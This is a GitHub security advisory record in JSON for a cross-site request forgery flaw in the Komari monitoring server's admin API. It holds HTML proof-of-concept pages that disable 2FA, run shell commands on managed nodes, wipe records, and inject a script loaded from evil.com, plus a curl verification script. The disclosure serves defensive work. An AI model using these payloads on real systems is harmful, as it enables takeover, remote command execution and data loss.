{"id":"GHSA-hxjg-93wc-h8p8","summary":"Komari: Management Interface CSRF","details":"# Vulnerability Overview\n\nThe `session_token` cookie is set **without** the `SameSite` or `Secure` attributes (`login.go:68`).\n\nAll `/api/admin/` management endpoints rely solely on this cookie for authentication, with **no CSRF token or Origin validation**.\n\n**The server-side vulnerability is confirmed to exist; however, exploitation via cross-site requests is mitigated in modern browsers by the default `SameSite=Lax` behavior.**\n\n## Root Cause\n\n```go\n// komari-main/api/public/login.go:68\nc.SetCookie(\"session_token\", session, 2592000, \"/\", \"\", false, true)\n//   Secure=false, SameSite not explicitly set\n//   Admin route group (server.go:213-343) has no CSRF middleware\n```\n\nGin's `ShouldBindJSON` does not strictly validate the `Content-Type` header, allowing `text/plain` requests to bypass CORS preflight.\n\n## Browser Limitations\n\n- Chrome 80+ (Feb 2020), Firefox 103+ (Jul 2022), and Safari all default unspecified cookies to `SameSite=Lax`.\n- Cookies without an explicit `SameSite` attribute **are not included in cross-site POST requests**.\n- As a result, the server receives requests without the session cookie and returns **HTTP 401 Unauthorized**.\n\n| Scenario | Exploitable |\n|----------|-------------|\n| Cross-site HTML (modern browsers) | ✗ Blocked by `SameSite=Lax` |\n| Cross-site HTML (Chrome \u003c80 / legacy browsers) | ✓ |\n| Same-origin context (Browser Console / existing XSS) | ✓ |\n| Man-in-the-middle over HTTP (`Secure=false`) | ✓ |\n\n## High-Impact Operations Reachable via CSRF\n\n| Endpoint | Method | Impact |\n|----------|--------|--------|\n| `/api/admin/task/exec` | POST | Execute arbitrary shell commands on managed nodes |\n| `/api/admin/2fa/disable` | POST | Disable administrator two-factor authentication |\n| `/api/admin/settings/` | POST | Modify system configuration |\n| `/api/admin/upload/backup` | POST | Upload a malicious backup |\n| `/api/admin/record/clear/all` | POST | Delete all monitoring records |\n| `/api/admin/client/:uuid/edit` | POST | Modify client configuration |\n| `/api/admin/client/:uuid/remove` | POST | Remove managed clients |\n| `/api/admin/session/remove/all` | POST | Invalidate all active sessions |\n| `/api/admin/settings/cloudflared/start` | POST | Start a Cloudflared tunnel |\n\n## PoC 1 — Disable 2FA\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\u003ctitle\u003eLoading...\u003c/title\u003e\u003c/head\u003e\n\u003cbody\u003e\n\u003ciframe name=\"sink\" style=\"display:none\"\u003e\u003c/iframe\u003e\n\u003cform id=\"f\" method=\"POST\"\n      action=\"https://komari.example.com/api/admin/2fa/disable\"\n      target=\"sink\"\u003e\u003c/form\u003e\n\u003cscript\u003e\n  document.getElementById('f').submit();\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n## PoC 2 — Remote Command Execution\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\u003ctitle\u003eLoading...\u003c/title\u003e\u003c/head\u003e\n\u003cbody\u003e\n\u003cscript\u003e\nvar KOMARI = \"https://komari.example.com\";\nvar CMD    = \"id && hostname && whoami\";\n\nfetch(KOMARI + \"/api/admin/client/list\", { credentials: \"include\" })\n  .then(function(r){ return r.json(); })\n  .then(function(data){\n    var nodes = data.data || [];\n    var uuids = [];\n    for (var i = 0; i \u003c nodes.length; i++) {\n      if (nodes[i].uuid) uuids.push(nodes[i].uuid);\n    }\n    if (uuids.length === 0) return;\n    return fetch(KOMARI + \"/api/admin/task/exec\", {\n      method: \"POST\",\n      credentials: \"include\",\n      headers: { \"Content-Type\": \"application/json\" },\n      body: JSON.stringify({ command: CMD, clients: uuids })\n    });\n  });\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n## PoC 3 — Modify System Configuration\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\u003ctitle\u003eLoading...\u003c/title\u003e\u003c/head\u003e\n\u003cbody\u003e\n\u003cscript\u003e\nvar KOMARI = \"https://komari.example.com\";\nfetch(KOMARI + \"/api/admin/settings/\", {\n  method: \"POST\",\n  credentials: \"include\",\n  headers: { \"Content-Type\": \"application/json\" },\n  body: JSON.stringify({\n    \"site_name\": \"Pwned\",\n    \"custom_head\": \"\u003cscript src='https://evil.com/hook.js'\u003e\u003c\\/script\u003e\"\n  })\n});\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n## PoC 4 — Clear All Monitoring Records\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\u003ctitle\u003eLoading...\u003c/title\u003e\u003c/head\u003e\n\u003cbody\u003e\n\u003ciframe name=\"sink\" style=\"display:none\"\u003e\u003c/iframe\u003e\n\u003cform id=\"f\" method=\"POST\"\n      action=\"https://komari.example.com/api/admin/record/clear/all\"\n      target=\"sink\"\u003e\u003c/form\u003e\n\u003cscript\u003e\ndocument.getElementById('f').submit();\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n## Verification Script\n\n```bash\n#!/bin/bash\nKOMARI=\"${1:-https://komari.example.com}\"\n\necho \"=== CSRF Verification ===\"\n\necho \"[1] Cookie Attributes...\"\ncurl -s -D - -o /dev/null \\\n  -X POST \"$KOMARI/api/public/login\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"test\",\"password\":\"test\"}' | grep -i 'set-cookie'\n\necho \"\"\necho \"[2] CORS Headers...\"\ncurl -s -D - -o /dev/null \\\n  -H \"Origin: https://evil.com\" \\\n  \"$KOMARI/api/public/config\" | grep -i 'access-control'\n\necho \"\"\necho \"[3] CSRF Protection on Admin Endpoint...\"\nCODE=$(curl -s -o /dev/null -w \"%{http_code}\" \\\n  -X POST \"$KOMARI/api/admin/settings/\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Origin: https://evil.com\" \\\n  -d '{}')\n\necho \"    HTTP ${CODE} — A 401 response indicates that only session authentication is enforced and no CSRF protection is present.\"\n```","aliases":["GO-2026-6449"],"modified":"2026-09-17T17:41:04.653498506Z","published":"2026-09-09T23:48:31Z","database_specific":{"github_reviewed_at":"2026-09-09T23:48:31Z","nvd_published_at":null,"cwe_ids":["CWE-918"],"severity":"HIGH","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/komari-monitor/komari/security/advisories/GHSA-hxjg-93wc-h8p8"},{"type":"PACKAGE","url":"https://github.com/komari-monitor/komari"},{"type":"WEB","url":"https://github.com/komari-monitor/komari/releases/tag/1.2.2"}],"affected":[{"package":{"name":"github.com/komari-monitor/komari","ecosystem":"Go","purl":"pkg:golang/github.com/komari-monitor/komari"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.0.0-20260609084633-98122fa4d110"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-hxjg-93wc-h8p8/GHSA-hxjg-93wc-h8p8.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}]}